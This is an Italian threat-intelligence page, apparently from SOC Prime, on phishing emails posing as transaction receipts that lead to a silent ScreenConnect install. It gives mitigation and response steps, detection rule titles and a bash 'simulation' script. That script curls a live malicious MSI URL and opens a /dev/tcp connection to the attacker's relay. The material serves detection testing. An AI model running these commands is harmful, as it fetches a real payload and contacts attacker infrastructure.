SOC Prime Bias: High

19 Aug 2026 07:43 UTC

Malware Phishing/Truffa: Email di Phishing Nascoste come Ricevute di Transazione

Author Photo
SOC Prime Team linkedin icon Segui
Malware Phishing/Truffa: Email di Phishing Nascoste come Ricevute di Transazione
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

Gli attori delle minacce stanno inviando email di phishing che impersonano dipendenti di aziende statunitensi e includono allegati mascherati da ricevute di transazione. L’attacco utilizza un PDF dannoso per indurre gli utenti a scaricare un presunto aggiornamento di Adobe Flash Player che in realtà avvia un VBScript. Lo script quindi installa il legittimo strumento di gestione remota ScreenConnect per stabilire un accesso remoto persistente per attività successive.

Indagine

AhnLab Security Intelligence Center (ASEC) ha identificato la campagna esaminando il contenuto delle email di phishing e il comportamento del PDF allegato. L’indagine ha tracciato la catena di esecuzione dal VBScript dannoso al recupero del payload in background e all’installazione silenziosa di un pacchetto MSI utilizzando curl.exe and msiexec.exe.

Mitigazione

Gli utenti dovrebbero essere addestrati a riconoscere i tentativi di phishing che coinvolgono ricevute di transazione inattese e inviti a installare aggiornamenti software come Adobe Flash Player. Le organizzazioni dovrebbero limitare l’esecuzione di VBScript e monitorare l’uso non autorizzato di strumenti di gestione remota inclusi ScreenConnect. La lista bianca delle applicazioni può anche aiutare a prevenire l’esecuzione di pacchetti MSI sconosciuti o non approvati.

Risposta

Se viene rilevata un’attività dannosa, il sistema interessato dovrebbe essere isolato immediatamente per evitare l’accesso remoto tramite ScreenConnect. I risponditori dovrebbero terminare le sessioni attive associate a relay.Gamedbd.Com l’infrastruttura e controllare il registro per le informazioni di sessione memorizzate. Un’indagine forense completa dovrebbe anche determinare se è avvenuto movimento laterale o esfiltrazione di dati tramite lo strumento di gestione remota.

Flusso dell’attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

LOLBAS WScript / CScript (via process_creation)

Team SOC Prime
18 Agosto 2026

Software Alternativo di Accesso Remoto / Gestione (via process_creation)

Team SOC Prime
18 Agosto 2026

Possibile Infiltrazione / Esfiltrazione di Dati / C2 tramite Servizi / Strumenti di Terze Parti (via proxy)

Team SOC Prime
18 Agosto 2026

Possibile Infiltrazione / Esfiltrazione di Dati / C2 tramite Servizi / Strumenti di Terze Parti (via dns)

Team SOC Prime
18 Agosto 2026

IOC (HashMd5) per rilevare: Malware Phishing/Scam: Email di Phishing mascherate da Ricevute di Transazione

Regole AI SOC Prime
18 Agosto 2026

Rilevamento di Email di Phishing mascherate da Ricevute di Transazione [Proxy]

Regole AI SOC Prime
18 Agosto 2026

Email di Phishing che Impersonano Ricevute di Transazione Portano all’Installazione di Pacchetti MSI [Creazione del Processo Windows]

Regole AI SOC Prime
18 Agosto 2026

Esecuzione di Simulazione

Prerequisito: Il Controllo Preliminare di Telemetria e Baseline deve essere superato.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirare a generare l’esatta telemetria attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrativa dell’Attacco & Comandi: L’avversario avvia una campagna di phishing inviando un’email riguardante una transazione fallita. Il link indirizza la vittima a https://transaction-sucessful.vercel.app, che ospita una finta ricevuta. Quando la vittima clicca su “Scarica Ricevuta”, il browser tenta di recuperare https://payment-six-eta.vercel.app/doc/sc.msi. Una volta eseguito il payload, tenta di stabilire una sessione di accesso remoto collegandosi al relay ScreenConnect a relay.gamedbd.com:8041. Questa sequenza testa sia il rilevamento basato su URL sia quello basato su dominio/porta.

  • Script di Test di Regressione:

    #!/bin/bash
    # Script di simulazione per attivare la regola di rilevamento Phishing/ScreenConnect
    
    echo "[+] Avvio Simulazione: Test di Rilevamento Phishing/ScreenConnect"
    
    # 1. Simula il download del MSI dannoso dall'URL Vercel
    echo "[+] Passo 1: Simulazione connessione all'URL Vercel dannoso..."
    curl -s -o /dev/null "https://payment-six-eta.vercel.app/doc/sc.msi"
    
    # 2. Simula la connessione al dominio/porta specifico del relay ScreenConnect
    echo "[+] Passo 2: Simulazione connessione al relay ScreenConnect dannoso..."
    # Utilizziamo /dev/tcp per simulare un tentativo di connessione senza necessità di un listener reale
    timeout 2 bash -c 'cat < /dev/null > /dev/tcp/relay.gamedbd.com/8041' 2>/dev/null
    
    echo "[+] Simulazione Completata. Verifica gli avvisi nel SIEM."
  • Comandi di Cleanup:

    # Nessun artefatto persistente è creato da questa simulazione basata su rete.
    # Se sono stati scaricati file locali, devono essere rimossi:
    rm -f sc.msi
    echo "[+] Cleanup completato."